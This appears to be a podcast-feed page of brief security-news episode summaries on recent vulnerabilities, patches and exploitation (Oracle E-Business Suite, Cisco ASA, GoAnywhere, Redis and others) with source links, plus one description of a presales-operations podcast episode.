More Details About Oracle 0-Day The exploit is now widely distributed and has been analyzed to show the nature of the underlying vulnerabilities. https://isc.sans.edu/diary/Quick%20and%20Dirty%20Analysis%20of%20Possible%20Oracle%20E-Business%20Suite%20Exploit%20Script%20%28CVE-2025-61882%29%20%5BUPDATED%5B/32346 https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/ Redis Vulnerability Redis patched a ciritcal use after free vulnerability that could lead to arbitrary code execution. https://redis.io/blog/security-advisory-cve-2025-49844/ GoAnywhere Bug Exploited Microsoft is reporting about the exploitation of the recent GoAnywhere vulnerability https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/

In this episode, Jack Cochran and Matthew James are joined by Rob Bruce, a presales leader at Syndigo with 20 years of experience, to discuss an innovative approach to presales operations: the Pursuit Desk. Rob shares how Syndigo has built a dedicated "concierge team" that handles RFPs, security questionnaires, reference coordination, and other time-consuming tasks, freeing solutions engineers to focus on discovery, solutioning, and building customer relationships. The conversation explores how to operate at the "top of your license," the role of AI in scaling pursuit operations, and practical advice for championing similar initiatives at your organization. Thank you to Elvance for sponsoring this episode: https://elvance.io Follow Us Connect with Jack Cochran: https://www.linkedin.com/in/jackcochran/ Connect with Matthew James: https://www.linkedin.com/in/matthewyoungjames/ Connect with Rob Bruce: https://www.linkedin.com/in/robbruce/ Links and Resources Mentioned Join Presales Collective Slack: https://www.presalescollective.com/slack Book: "Selling is Hard, Buying is Harder" by Garen Hess Timestamps 00:00 Welcome 04:29 What is a Presales Concierge 11:18 Presales culture 14:00 Working at the top of your diploma 17:10 How do you justify this 21:38 As focused as an F1 team 23:32 AI and the Pursuit Desk Key Topics Covered The Pursuit Desk Concept Functions as a presales concierge handling non-customer-facing tasks Manages RFPs, InfoSec documents, NDAs, reference coordination Creates centralized control over messaging and responses Operates on a global scale with cultural sensitivity Operating at the Top of Your License Focus on discovery, creative thinking, empathetic listening, and presenting solutions Eliminate time spent on administrative tasks that don't require SE expertise Reduce context switching and multitasking to maintain flow Maximize value delivery to customers and the organization Building the Business Case Find an executive sponsor to champion the initiative Measure impact through deal win rates and velocity Consider creative budget reallocation (travel budgets, etc.) Calculate ROI based on SE productivity and reduced burnout The Role of AI in Pursuit Operations AI handles first-pass RFP responses (80% completion) Pursuit desk personalizes and adds empathy (final 20%) Machine learning analyzes past deals for pattern recognition Go/no-go scorecards based on historical data Enables scaling without proportional headcount increases Presales Culture and Values Building trust through technical expertise and genuine personality Being a "chameleon" who adapts to different buyer needs Creating an environment where people feel welcomed and valued Mentorship and knowledge sharing across teams Preventing Burnout Eliminating nights and weekends spent on RFPs Reducing stress through better task distribution Enabling SEs to focus on work they're passionate about Creating sustainable workloads that retain top talent Measuring Success Tracking time spent on each RFP or pursuit activity Correlating effort to win-loss rates Building audit trails for continuous improvement Creating dashboards for data-driven decision making  

Oracle E-Business Suite 0-Day CVE-2025-61882 Last week, the Cl0p ransomware gang sent messages to many businesses stating that an Oracle E-Business Suite vulnerability was used to exfiltrate data. Initially, Oracle believed the root cause to be a vulnerability patched in June, but now Oracle released a patch for a new vulnerability. https://www.oracle.com/security-alerts/alert-cve-2025-61882.html Zimbra Exploit Analysis An exploit against a Zimbra system prior to the patch release is analyzed. These exploits take advantage of .ics files to breach vulnerable systems. https://strikeready.com/blog/0day-ics-attack-in-the-wild/ Unity Editor Vulnerability CVE-2025-59489 The Unity game editor suffered from a code execution vulnerablity that would also expose software developed with vulnerable versions https://unity.com/security/sept-2025-01

More .well-known scans Attackers are using API documentation automatically published in the .well-known directory for reconnaissance. https://isc.sans.edu/diary/More%20.well-known%20Scans/32340 RedHat Patches Openshift AI Services A flaw was found in Red Hat Openshift AI Service. A low-privileged attacker with access to an authenticated account, for example, as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator. https://access.redhat.com/security/cve/cve-2025-10725#cve-affected-packages TOTOLINK X6000R Vulnerabilities Paloalto released details regarding three recently patched vulnerabilities in TotalLink-X6000R routers. https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/ DrayOS Vulnerability Patched Draytek fixed a single memory corruption vulnerability in its Vigor series router. An unauthenticated user may use it to execute arbitrary code. https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities

Comparing Honeypot Passwords with HIBP Most passwords used against our honeypots are also found in the Have I been pwn3d list. However, the few percent that are not found tend to be variations of known passwords, extending them to find likely mutations. https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Comparing%20Honeypot%20Passwords%20with%20HIBP/32310 Breaking Server SGX via DRAM Inspection By observing read and write operations to memory, it is possible to derive keys stored in SGX and break the security of systems relying on SGX. https://wiretap.fail/files/wiretap.pdf OneLogin OIDC Vulnerability A vulnerability in OneLogin can be used to read secret application keys https://www.clutch.security/blog/onelogin-many-secrets-clutch-uncovers-vulnerability-exposing-client-credentials OpenSSL Patch OpenSSL patched three vulnerabilities. One could lead to remote code execution, but the feature is used infrequently, and the exploit is difficult, according to OpenSSL

Sometimes you don t even need to log in Applications using simple, predictable cookies to verify a user s identity are still exploited, and relatively recent vulnerabilities are still due to this very basic mistake. https://isc.sans.edu/diary/%22user%3Dadmin%22.%20Sometimes%20you%20don%27t%20even%20need%20to%20log%20in./32334 Western Digital My Cloud Vulnerability Western Digital patched a critical vulnerability in its MyCloud device. https://nvd.nist.gov/vuln/detail/CVE-2025-30247 sudo vulnerability exploited A recently patched vulnerability in sudo is now being exploited. https://www.sudo.ws/security/advisories/

Apple Patches Apple released patches for iOS, macOS, and visionOS, fixing a single font parsing vulnerability https://isc.sans.edu/diary/Apple%20Patches%20Single%20Vulnerability%20CVE-2025-43400/32330 Increase in Scans for Palo Alto Global Protect Vulnerability (CVE-2024-3400). Our honeypots detected an increase in scans for a Palo Alto Global Protect vulnerability. https://isc.sans.edu/diary/Increase%20in%20Scans%20for%20Palo%20Alto%20Global%20Protect%20Vulnerability%20%28CVE-2024-3400%29/32328 Nimbus Manticore / Charming Kitten Malware update Checkpoint released a report with details regarding a new Nimbus Manticore exploit kit. The malware in this case uses valid SSL.com-issued certificates. https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/

Converting Timestamps in .bash_history Unix shells offer the ability to add timestamps to commands in the .bash_history file. This is often done in the form of Unix timestamps. This new tool converts these timestamps into a more readable format. https://isc.sans.edu/diary/New%20tool%3A%20convert-ts-bash-history.py/32324 Cisco ASA/FRD Compromises Exploitation of the vulnerabilities Cisco patched last week may have bone back about a year. Cisco and CISA have released advisories with help identifying affected devices. https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices Github Notification Phishing Github notifications are used to impersonate YCombinator and trick victims into installing a crypto drainer. https://www.bleepingcomputer.com/news/security/github-notifications-abused-to-impersonate-y-combinator-for-crypto-theft/

Webshells Hiding in .well-known Places Our honeypots registered an increase in scans for URLs in the .well-known directory, which appears to be looking for webshells. https://isc.sans.edu/diary/Webshells%20Hiding%20in%20.well-known%20Places/32320 Cisco Patches Critical Exploited Vulnerabilities Cisco released updates addressing already-exploited vulnerabilities in the VPN web server for the ASA and FTD appliances. https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW XCSSET Evolves Again Microsoft detected a new XCSSET variant, an infostealer infecting X-Code projects. https://www.microsoft.com/en-us/security/blog/2025/09/25/xcsset-evolves-again-analyzing-the-latest-updates-to-xcssets-inventory/ Exploitation of Fortra GoAnywhere MFT CVE-2025-10035 watchTowr analyzed the latest GoAnywhere MFT vulnerability and exploits used against it. https://labs.watchtowr.com/it-is-bad-exploitation-of-fortra-goanywhere-mft-cve-2025-10035-part-2/